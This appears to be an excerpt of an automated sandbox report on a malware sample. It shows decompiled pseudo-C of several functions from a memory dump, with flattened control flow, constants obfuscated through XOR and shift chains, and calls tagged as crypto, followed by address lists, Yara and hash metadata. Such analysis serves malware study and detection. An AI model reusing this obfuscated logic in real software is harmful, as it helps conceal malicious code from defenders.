				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0x6dca20; // 0x0
							_t260 = E006D1B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E006CF536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E006D2674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
						_t268 = E006C8736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0x6dca20; // 0x0
						E006C55D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0x6dca20; // 0x0
						_push(_t283);
						_push(_t283);
						E006D838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E006C5F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}



















































                                          0x006d9b49
                                          0x006d9b53
                                          0x006d9b54
                                          0x006d9b5b
                                          0x006d9b5d
                                          0x006d9b5e
                                          0x006d9b5f
                                          0x006d9b64
                                          0x006d9b6c
                                          0x006d9b6f
                                          0x006d9b7b
                                          0x006d9b7d
                                          0x006d9b84
                                          0x006d9b87
                                          0x006d9b8b
                                          0x006d9b93
                                          0x006d9b9b
                                          0x006d9ba3
                                          0x006d9ba8
                                          0x006d9bb0
                                          0x006d9bb8
                                          0x006d9bc5
                                          0x006d9bc9
                                          0x006d9bd1
                                          0x006d9bd9
                                          0x006d9be1
                                          0x006d9be9
                                          0x006d9bf1
                                          0x006d9bf9
                                          0x006d9c01
                                          0x006d9c09
                                          0x006d9c11
                                          0x006d9c19
                                          0x006d9c21
                                          0x006d9c29
                                          0x006d9c2e
                                          0x006d9c36
                                          0x006d9c3e
                                          0x006d9c46
                                          0x006d9c4e
                                          0x006d9c56
                                          0x006d9c5e
                                          0x006d9c63
                                          0x006d9c6b
                                          0x006d9c73
                                          0x006d9c7b
                                          0x006d9c83
                                          0x006d9c87
                                          0x006d9c8f
                                          0x006d9c97
                                          0x006d9c9f
                                          0x006d9ca7
                                          0x006d9caf
                                          0x006d9cb7
                                          0x006d9cbc
                                          0x006d9cc4
                                          0x006d9cd4
                                          0x006d9cd8
                                          0x006d9ce0
                                          0x006d9ce8
                                          0x006d9cf0
                                          0x006d9cf5
                                          0x006d9cfd
                                          0x006d9d09
                                          0x006d9d0c
                                          0x006d9d10
                                          0x006d9d18
                                          0x006d9d20
                                          0x006d9d26
                                          0x006d9d2b
                                          0x006d9d33
                                          0x006d9d3b
                                          0x006d9d43
                                          0x006d9d4b
                                          0x006d9d5a
                                          0x006d9d5d
                                          0x006d9d61
                                          0x006d9d69
                                          0x006d9d71
                                          0x006d9d76
                                          0x006d9d7e
                                          0x006d9d86
                                          0x006d9d93
                                          0x006d9d97
                                          0x006d9d9f
                                          0x006d9da7
                                          0x006d9daf
                                          0x006d9db7
                                          0x006d9dbf
                                          0x006d9dc7
                                          0x006d9dcc
                                          0x006d9dd4
                                          0x006d9de4
                                          0x006d9de8
                                          0x006d9df0
                                          0x006d9df8
                                          0x006d9e04
                                          0x006d9e09
                                          0x006d9e0f
                                          0x006d9e14
                                          0x006d9e1c
                                          0x006d9e24
                                          0x006d9e2c
                                          0x006d9e31
                                          0x006d9e39
                                          0x006d9e3e
                                          0x006d9e46
                                          0x006d9e4e
                                          0x006d9e56
                                          0x006d9e5e
                                          0x006d9e66
                                          0x006d9e72
                                          0x006d9e75
                                          0x006d9e7c
                                          0x006d9e85
                                          0x006d9e89
                                          0x006d9e91
                                          0x006d9e91
                                          0x006d9e95
                                          0x006d9e95
                                          0x006d9e95
                                          0x006d9e9b
                                          0x00000000
                                          0x00000000
                                          0x006da010
                                          0x006da04c
                                          0x006da064
                                          0x006da069
                                          0x006da06e
                                          0x006da07a
                                          0x006da07f
                                          0x006da085
                                          0x006da0a5
                                          0x006da0ae
                                          0x006da0ae
                                          0x006d9e91
                                          0x006d9e91
                                          0x00000000
                                          0x006d9e91
                                          0x006d9e91
                                          0x006da070
                                          0x006d9e91
                                          0x006d9e91
                                          0x00000000
                                          0x006d9e91
                                          0x006d9e91
                                          0x006da018
                                          0x006da038
                                          0x00000000
                                          0x00000000
                                          0x006da03a
                                          0x00000000
                                          0x006da03a
                                          0x006da020
                                          0x006da08e
                                          0x006da09e
                                          0x006da0a4
                                          0x00000000
                                          0x006da08e
                                          0x006da028
                                          0x00000000
                                          0x00000000
                                          0x006da02a
                                          0x006da02a
                                          0x006d9ea1
                                          0x006d9ff8
                                          0x006d9ffd
                                          0x006da000
                                          0x006d9e91
                                          0x006d9e91
                                          0x00000000
                                          0x006d9e91
                                          0x006d9e91
                                          0x006d9ead
                                          0x006d9f9c
                                          0x006d9fab
                                          0x006d9fac
                                          0x006d9fb0
                                          0x006d9fb5
                                          0x006d9fbb
                                          0x00000000
                                          0x00000000
                                          0x006d9fc1
                                          0x006d9fc3
                                          0x006d9fcb
                                          0x006d9fd2
                                          0x006d9fd5
                                          0x006d9fd9
                                          0x00000000
                                          0x006d9fd9
                                          0x006d9eb9
                                          0x006d9f8c
                                          0x00000000
                                          0x006d9f8c
                                          0x006d9ec5
                                          0x006d9f42
                                          0x006d9f6f
                                          0x006d9f74
                                          0x006d9f79
                                          0x006d9f81
                                          0x006d9e91
                                          0x006d9e91
                                          0x00000000
                                          0x006d9e91
                                          0x006d9e91
                                          0x006d9ecd
                                          0x006d9efb
                                          0x006d9f00
                                          0x006d9f01
                                          0x006d9f24
                                          0x006d9f2b
                                          0x006d9f31
                                          0x006d9f34
                                          0x006d9e91
                                          0x006d9e91
                                          0x00000000
                                          0x006d9e91
                                          0x006d9e91
                                          0x006d9ed5
                                          0x00000000
                                          0x00000000
                                          0x006d9eeb
                                          0x006d9eec
                                          0x006d9eed
                                          0x006d9ef4
                                          0x006d9ef4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: /,$!t$$R$'$0]$K.$b=$v+
                                          • API String ID: 0-2997250437
                                          • Opcode ID: 2b4b2306d8950dae9ed2f025b325ab5ecdb041619b9d9237f27f91bc187654e3
                                          • Instruction ID: 8290eaf6e743b812c6462a8f11429e8fe025018024055d08e188f99a8ed1a84c
                                          • Opcode Fuzzy Hash: 2b4b2306d8950dae9ed2f025b325ab5ecdb041619b9d9237f27f91bc187654e3
                                          • Instruction Fuzzy Hash: 99D145715083409FD768CF65C48991FBBE2FB88708F208A1EF59686260D7B9D949CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D12E2, Relevance: 10.2, Strings: 8, Instructions: 239COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E006D12E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E006CB75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E006C28CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E006C5AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E006DA889(_v1068, _v1064,  &_v1040);
							E006C2BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E006C7B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0x6dca2c; // 0x248300
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E006D889D(0x6dc9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0x6dca2c; // 0x248300
						_t197 = _t293 + 0x230; // 0x710050
						E006CC680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x6dca2c, _t257,  &_v520);
						_t256 = E006D2025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E006D63C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}














































                                          0x006d12e2
                                          0x006d12e8
                                          0x006d12ef
                                          0x006d12f4
                                          0x006d12f9
                                          0x006d1301
                                          0x006d1309
                                          0x006d1311
                                          0x006d1319
                                          0x006d1321
                                          0x006d1332
                                          0x006d133c
                                          0x006d1341
                                          0x006d1347
                                          0x006d134f
                                          0x006d1357
                                          0x006d135f
                                          0x006d1367
                                          0x006d136f
                                          0x006d1377
                                          0x006d137f
                                          0x006d138b
                                          0x006d1390
                                          0x006d1396
                                          0x006d139e
                                          0x006d13a6
                                          0x006d13ab
                                          0x006d13b3
                                          0x006d13bb
                                          0x006d13c0
                                          0x006d13c5
                                          0x006d13c6
                                          0x006d13ca
                                          0x006d13d2
                                          0x006d13da
                                          0x006d13e2
                                          0x006d13e7
                                          0x006d13ef
                                          0x006d13fc
                                          0x006d1400
                                          0x006d1405
                                          0x006d140d
                                          0x006d1415
                                          0x006d141a
                                          0x006d1422
                                          0x006d142a
                                          0x006d1432
                                          0x006d143a
                                          0x006d1442
                                          0x006d144a
                                          0x006d1457
                                          0x006d145b
                                          0x006d1463
                                          0x006d1471
                                          0x006d1475
                                          0x006d147d
                                          0x006d1485
                                          0x006d148a
                                          0x006d1492
                                          0x006d149a
                                          0x006d14a2
                                          0x006d14aa
                                          0x006d14b2
                                          0x006d14c3
                                          0x006d14d0
                                          0x006d14d9
                                          0x006d14e1
                                          0x006d14e9
                                          0x006d14f9
                                          0x006d14fd
                                          0x006d1505
                                          0x006d1509
                                          0x006d150e
                                          0x006d1514
                                          0x006d151c
                                          0x006d1524
                                          0x006d152d
                                          0x006d1532
                                          0x006d1538
                                          0x006d1540
                                          0x006d1548
                                          0x006d1550
                                          0x006d155d
                                          0x006d155e
                                          0x006d1562
                                          0x006d156a
                                          0x006d1572
                                          0x006d1580
                                          0x006d1584
                                          0x006d158c
                                          0x006d1594
                                          0x006d159c
                                          0x006d15a0
                                          0x006d15a5
                                          0x006d15ad
                                          0x006d15b5
                                          0x006d15bd
                                          0x006d15c5
                                          0x006d15cd
                                          0x006d15d5
                                          0x006d15dd
                                          0x006d15e5
                                          0x006d15ed
                                          0x006d15f5
                                          0x006d15fd
                                          0x006d15fd
                                          0x006d1607
                                          0x006d1713
                                          0x006d1718
                                          0x00000000
                                          0x006d1718
                                          0x006d1613
                                          0x006d1747
                                          0x006d1750
                                          0x006d1752
                                          0x00000000
                                          0x006d1767
                                          0x006d161f
                                          0x006d16b9
                                          0x006d16bf
                                          0x006d16e0
                                          0x006d16f0
                                          0x006d16f4
                                          0x006d16fc
                                          0x006d16fd
                                          0x006d1702
                                          0x006d1705
                                          0x00000000
                                          0x006d1705
                                          0x006d162b
                                          0x006d169b
                                          0x006d16a2
                                          0x006d16a9
                                          0x00000000
                                          0x006d16a9
                                          0x006d162d
                                          0x006d162f
                                          0x00000000
                                          0x00000000
                                          0x006d1635
                                          0x006d1642
                                          0x006d1647
                                          0x006d1659
                                          0x006d1666
                                          0x006d1670
                                          0x006d1676
                                          0x006d1689
                                          0x006d168e
                                          0x006d1691
                                          0x006d1691
                                          0x006d1723
                                          0x006d1728
                                          0x006d172a
                                          0x006d172a
                                          0x006d172a
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: m $+$IP$j_$k$ld8$n2$B
                                          • API String ID: 0-4100556268
                                          • Opcode ID: 8ae0a216ff1c002fa9d2164bebe180001070dba8383a526b5188806efdf0665f
                                          • Instruction ID: b079854c8dafd7e702546b80f2a5ee616f5b00f9ce1a1e2f1560fb6bc8fb91a3
                                          • Opcode Fuzzy Hash: 8ae0a216ff1c002fa9d2164bebe180001070dba8383a526b5188806efdf0665f
                                          • Instruction Fuzzy Hash: 28B13271508341DFD368CF25C58995BBBF2BBC4758F408A1EF1969A260C7B58A09CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CB75F, Relevance: 10.2, Strings: 8, Instructions: 223COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E006CB75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E006CE22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E006D889D(0x6dc9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E006D3EB3(_v52, _t241, _t218, _v76, _v56, 0x6dc9d0, _v80, _v28, 0x6dc9d0, _v84, 0x6dc9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E006D2025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E006C65A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0x6dca2c; // 0x248300
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}










































                                          0x006cb75f
                                          0x006cb762
                                          0x006cb76c
                                          0x006cb776
                                          0x006cb77e
                                          0x006cb786
                                          0x006cb78e
                                          0x006cb793
                                          0x006cb798
                                          0x006cb7a0
                                          0x006cb7a7
                                          0x006cb7ae
                                          0x006cb7b2
                                          0x006cb7be
                                          0x006cb7c2
                                          0x006cb7c7
                                          0x006cb7cf
                                          0x006cb7d7
                                          0x006cb7df
                                          0x006cb7e7
                                          0x006cb7f6
                                          0x006cb7f9
                                          0x006cb805
                                          0x006cb809
                                          0x006cb811
                                          0x006cb819
                                          0x006cb826
                                          0x006cb829
                                          0x006cb82d
                                          0x006cb835
                                          0x006cb83d
                                          0x006cb84d
                                          0x006cb851
                                          0x006cb859
                                          0x006cb865
                                          0x006cb86a
                                          0x006cb870
                                          0x006cb875
                                          0x006cb87d
                                          0x006cb885
                                          0x006cb891
                                          0x006cb896
                                          0x006cb89c
                                          0x006cb8a4
                                          0x006cb8b1
                                          0x006cb8b2
                                          0x006cb8b6
                                          0x006cb8be
                                          0x006cb8c6
                                          0x006cb8ce
                                          0x006cb8dc
                                          0x006cb8e0
                                          0x006cb8e5
                                          0x006cb8ed
                                          0x006cb903
                                          0x006cb906
                                          0x006cb90a
                                          0x006cb90e
                                          0x006cb916
                                          0x006cb926
                                          0x006cb92a
                                          0x006cb92f
                                          0x006cb937
                                          0x006cb93f
                                          0x006cb94b
                                          0x006cb950
                                          0x006cb956
                                          0x006cb95e
                                          0x006cb966
                                          0x006cb96b
                                          0x006cb970
                                          0x006cb978
                                          0x006cb980
                                          0x006cb989
                                          0x006cb98c
                                          0x006cb990
                                          0x006cb998
                                          0x006cb9a0
                                          0x006cb9a8
                                          0x006cb9ad
                                          0x006cb9b2
                                          0x006cb9ba
                                          0x006cb9c2
                                          0x006cb9ca
                                          0x006cb9d2
                                          0x006cb9da
                                          0x006cb9e2
                                          0x006cb9ea
                                          0x006cb9f2
                                          0x006cb9f7
                                          0x006cb9ff
                                          0x006cba07
                                          0x006cba07
                                          0x006cba09
                                          0x006cba0a
                                          0x006cba0f
                                          0x006cba0f
                                          0x006cba19
                                          0x006cbae9
                                          0x006cbaf0
                                          0x006cbaf3
                                          0x006cbaf5
                                          0x006cbafd
                                          0x00000000
                                          0x006cba1f
                                          0x006cba25
                                          0x006cba67
                                          0x006cba74
                                          0x006cba79
                                          0x006cbaaf
                                          0x006cbac8
                                          0x006cbacb
                                          0x006cbad0
                                          0x006cbad5
                                          0x006cbb24
                                          0x006cbb24
                                          0x00000000
                                          0x006cba27
                                          0x006cba2d
                                          0x006cba63
                                          0x00000000
                                          0x006cba2f
                                          0x006cba35
                                          0x00000000
                                          0x006cba3b
                                          0x006cba4f
                                          0x006cba54
                                          0x006cba35
                                          0x006cba2d
                                          0x006cba25
                                          0x006cba57
                                          0x006cba62
                                          0x006cba62
                                          0x006cbb06
                                          0x006cbb0c
                                          0x006cbb17
                                          0x006cbb17
                                          0x006cbb1a
                                          0x00000000
                                          0x00000000
                                          0x006cbb14
                                          0x006cbb14
